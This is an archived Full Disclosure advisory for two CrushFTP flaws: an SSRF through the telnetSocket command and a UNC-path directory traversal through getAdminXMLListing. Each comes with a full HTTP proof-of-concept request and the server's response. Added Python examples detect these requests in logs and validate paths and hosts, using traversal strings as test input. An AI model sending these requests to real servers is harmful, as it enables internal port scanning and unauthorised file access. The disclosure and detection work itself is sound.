
Full Disclosure mailing list archives
[CVE-2025-32102, CVE-2025-32103] SSRF and Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
From: Rafael Pedrero <rafael.pedrero () gmail com>
Date: Fri, 4 Apr 2025 08:01:00 +0200
# Exploit Title: Server-Side Request Forgery (SSRF) in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32102
# Vulnerability: CWE-918
# Category: webapps

1. Description

CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows SSRF via the host and port parameters in a command=telnetSocket request to the /WebInterface/function/ URI.

2. Proof of Concept

The application has a form to establish telnet connections. The parameters where the target is entered are host and port, for example, "host=127.0.0.1&port=8080". It can be used to scan remote ports, as it receives the string "Connected" if it connects successfully, whereas it receives "Connection%20refused" if it does not connect.

POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/admin/telnet.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq; currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090

command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq

Open port: 8080

<commandResult><response><id>PeT</id><data>Connected (/127.0.0.1) </data></response></commandResult>

Closed port: 8888

<commandResult><response><error>ERROR:java.net.ConnectException%3A%20Connection%20refused%3A%20getsockopt: (/127.0.0.1)</error>Error:java.lang.NullPointerException
</response></commandResult>

3. Solution: Update to the latest version of this product.


# Exploit Title: Directory Traversal in CrushFTP 10.7.1 and 11.1.0 (as well as legacy 9.x)
# Date: 2024-10-20
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.crushftp.com/
# Software Link: https://www.crushftp.com/download/
# Version: CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1
# Tested on: all
# CVE : CVE-2025-32103
# Vulnerability: CWE-40
# Category: webapps

1. Description

CrushFTP 9.x and 10.x through 10.8.4 and 11.x through 11.3.1 allows directory traversal via the /WebInterface/function/ URI to read files accessible by SMB at UNC share pathnames, bypassing SecurityManager restrictions.

2. Proof of Concept

The application's logic does not account for the fact that, when listing directories or files, the path can be modified to allow UNC paths from another machine on the network or on the internet instead of local files. An attacker injects a UNC path (\\server\resource) instead of a local path (such as C:/PATH) and gains access to remote directories or files. This is more specific than typical Path Traversal and occurs when network paths are not properly filtered or restricted.

POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Origin: http://127.0.0.1:9090
Connection: keep-alive
Referer: http://127.0.0.1:9090/WebInterface/Preferences/index.html
Cookie: CrushAuth=1729605510796_1Zx7MxaDU90dcHQHzIRihmd4peCaVq; currentAuth=CaVq
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:9090

command=getAdminXMLListing&file_mode=server&format=JSON&path=\\\\vboxsrv\\demo&random=0.7936410212028374&c2f=CaVq

<?xml version="1.0" encoding="UTF-8"?>
<listingInfo type="properties">
<path>////vboxsrv/demo/</path>
<privs>(read)(view)</privs>
<listing>l = new Array();
lp = {};
lp.name="directorio1";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio1";
lp.privs="(read)(view)";
lp.size="0";
lp.modified="0";
lp.created="null";
l[l.length] = lp;
lp = {};
lp.name="directorio2";
lp.type="DIR";
lp.root_dir="//vboxsrv/demo/";
lp.href_path="////vboxsrv/demo/directorio2";
...

The vulnerable parameter is path, where the local path can be changed to a remote path, thereby displaying remote directories. This could later be used for potential file downloads within those directories, just as it would if they were local.

3. Solution: Update to the latest version of this product.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
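Detection example for both issues above (SSRF through command=telnetSocket and UNC listing through command=getAdminXMLListing). This is an added example, not code from the advisory or from CrushFTP: it scans constructed access-log lines in a combined-log-like format where the URL-encoded POST body is appended as the final quoted field (that layout, the sample lines, the TELNET_ALLOWLIST entries and the function names are assumptions for the demo), and reports requests to /WebInterface/function/ whose telnet target is not allowlisted or whose listing path is a UNC share.

```python
"""Flag CrushFTP telnetSocket SSRF and UNC-path listing requests in web logs.

Added example (not from the advisory or from CrushFTP). The log layout is an
assumption: combined-log fields followed by the POST body as a quoted field.
"""
import ipaddress
import re
from urllib.parse import parse_qs

# Constructed sample log lines. The paths, hosts and random values are made up;
# the command names and parameters are the ones shown in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - admin [20/Oct/2024:13:05:10 +0200] "POST /WebInterface/function/ HTTP/1.1" 200 311 "command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17&c2f=CaVq"
10.0.0.5 - admin [20/Oct/2024:13:05:12 +0200] "POST /WebInterface/function/ HTTP/1.1" 200 311 "command=telnetSocket&sub_command=connect&host=10.0.0.20&port=445&random=0.18&c2f=CaVq"
10.0.0.5 - admin [20/Oct/2024:13:06:01 +0200] "POST /WebInterface/function/ HTTP/1.1" 200 2048 "command=getAdminXMLListing&file_mode=server&format=JSON&path=%5C%5C%5C%5Cvboxsrv%5C%5Cdemo&random=0.79&c2f=CaVq"
10.0.0.5 - admin [20/Oct/2024:13:06:30 +0200] "POST /WebInterface/function/ HTTP/1.1" 200 1500 "command=getAdminXMLListing&file_mode=server&format=JSON&path=C%3A%2FCrushFTP%2Flogs&random=0.80&c2f=CaVq"
10.0.0.5 - admin [20/Oct/2024:13:07:00 +0200] "POST /WebInterface/function/ HTTP/1.1" 200 311 "command=telnetSocket&sub_command=connect&host=telnet.example.com&port=23&random=0.19&c2f=CaVq"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<body>[^"]*)"$'
)

# UNC share spelled with backslashes or forward slashes, possibly doubled
# as in the advisory's request (\\\\host\\share) and response (////host/share).
UNC_RE = re.compile(r'^[\\/]{2,}[^\\/]+[\\/]+')

# Hosts the telnet helper is legitimately allowed to reach (assumed allowlist).
TELNET_ALLOWLIST = {"telnet.example.com"}


def is_unc_path(path):
    """True if the listing path points at a UNC share rather than a local directory."""
    return bool(UNC_RE.match(path))


def is_internal_host(host):
    """True for 'localhost' and loopback/private/link-local IP literals (names are not resolved)."""
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local


def analyze_line(line):
    """Return a finding dict for a suspicious /WebInterface/function/ request, else None."""
    m = LOG_RE.match(line)
    if not m or not m.group("uri").startswith("/WebInterface/function/"):
        return None
    # parse_qs percent-decodes values, so %5C becomes a literal backslash.
    params = {k: v[0] for k, v in parse_qs(m.group("body")).items()}
    base = {"client": m.group("client"), "user": m.group("user"), "time": m.group("ts")}
    cmd = params.get("command")
    if cmd == "telnetSocket" and params.get("sub_command") == "connect":
        host, port = params.get("host", ""), params.get("port", "")
        if host not in TELNET_ALLOWLIST:
            reason = "internal target" if is_internal_host(host) else "host not allowlisted"
            return {**base, "rule": "CVE-2025-32102 telnetSocket SSRF",
                    "target": f"{host}:{port}", "reason": reason}
    elif cmd == "getAdminXMLListing":
        path = params.get("path", "")
        if is_unc_path(path):
            return {**base, "rule": "CVE-2025-32103 UNC listing",
                    "target": path, "reason": "UNC share path"}
    return None


def scan(log_text):
    """Run analyze_line over every line and keep the findings."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two of the five sample lines are benign (a local C:/ listing and a telnet connection to the allowlisted host) and produce no finding; the loopback and RFC 1918 telnet targets and the UNC listing are reported. In a real deployment the body field would come from whatever request logging the reverse proxy or CrushFTP itself provides, and the allowlist from the hosts the telnet page is actually used for.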
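The two solutions above both say "update", which is the right fix. For readers who maintain similar functionality, here is an added example of the server-side checks whose absence the advisory describes: a listing path confined to a configured root (rejecting UNC prefixes, drive letters and ".." escapes) and a telnet target accepted only when it is allowlisted and resolves to globally routable addresses. This is not CrushFTP's code; the root /srv/crush, the allowlist, the function names and the resolver injection point are assumptions for the demo.

```python
"""Server-side validation for a listing path and a telnet target.

Added example, not CrushFTP code. Paths are resolved relative to a configured
root rather than accepted as absolute; telnet targets must be allowlisted and
must resolve only to global addresses.
"""
import ipaddress
import os
import re
import socket


class PathRejected(ValueError):
    """Listing path is a UNC share or escapes the configured root."""


class TargetRejected(ValueError):
    """Telnet target is not allowlisted or resolves to an internal address."""


def confine_path(root, requested):
    """Return the real path for `requested` only if it stays under `root`.

    Backslashes are treated as separators because the product runs on Windows
    and accepts both spellings; a leading drive letter or slash is stripped so
    the request can never name an absolute location on its own.
    """
    norm = requested.replace("\\", "/")
    if "\x00" in norm:
        raise PathRejected("NUL byte in path")
    if norm.startswith("//"):
        # \\server\share or //server/share: a UNC path, never a local directory.
        raise PathRejected(f"UNC path not allowed: {requested!r}")
    norm = re.sub(r"^[A-Za-z]:", "", norm).lstrip("/")
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, norm))
    # realpath collapses '..' and symlinks; commonpath then proves containment.
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        raise PathRejected(f"path escapes root: {requested!r}")
    return candidate


def validate_telnet_target(host, port, allowlist, resolver=socket.getaddrinfo):
    """Return the sorted addresses `host` resolves to, or raise TargetRejected.

    `resolver` has the socket.getaddrinfo signature; it is injectable so the
    check can be exercised without network access.
    """
    if host not in allowlist:
        raise TargetRejected(f"host not allowlisted: {host!r}")
    try:
        port_num = int(port)
    except ValueError:
        raise TargetRejected(f"bad port: {port!r}") from None
    if not 1 <= port_num <= 65535:
        raise TargetRejected(f"port out of range: {port_num}")
    addrs = sorted({info[4][0] for info in resolver(host, port_num, proto=socket.IPPROTO_TCP)})
    for addr in addrs:
        # is_global is False for loopback, RFC 1918, link-local, CGNAT and
        # documentation ranges, so an allowlisted name pointing inward is refused.
        if not ipaddress.ip_address(addr).is_global:
            raise TargetRejected(f"{host} resolves to non-global address {addr}")
    return addrs


if __name__ == "__main__":
    print(confine_path("/srv/crush", "uploads/report.txt"))
    for bad in ("//vboxsrv/demo", r"\\vboxsrv\demo", "uploads/../../etc/passwd"):
        try:
            confine_path("/srv/crush", bad)
        except PathRejected as exc:
            print("rejected:", exc)
```

The containment check uses the resolved root on both sides of the comparison, so a root that is itself a symlink still works; the UNC test runs before normalisation because once a UNC prefix is joined onto the root the information is lost. Resolving the allowlisted name and checking every returned address closes the case where a permitted hostname is later pointed at an internal address.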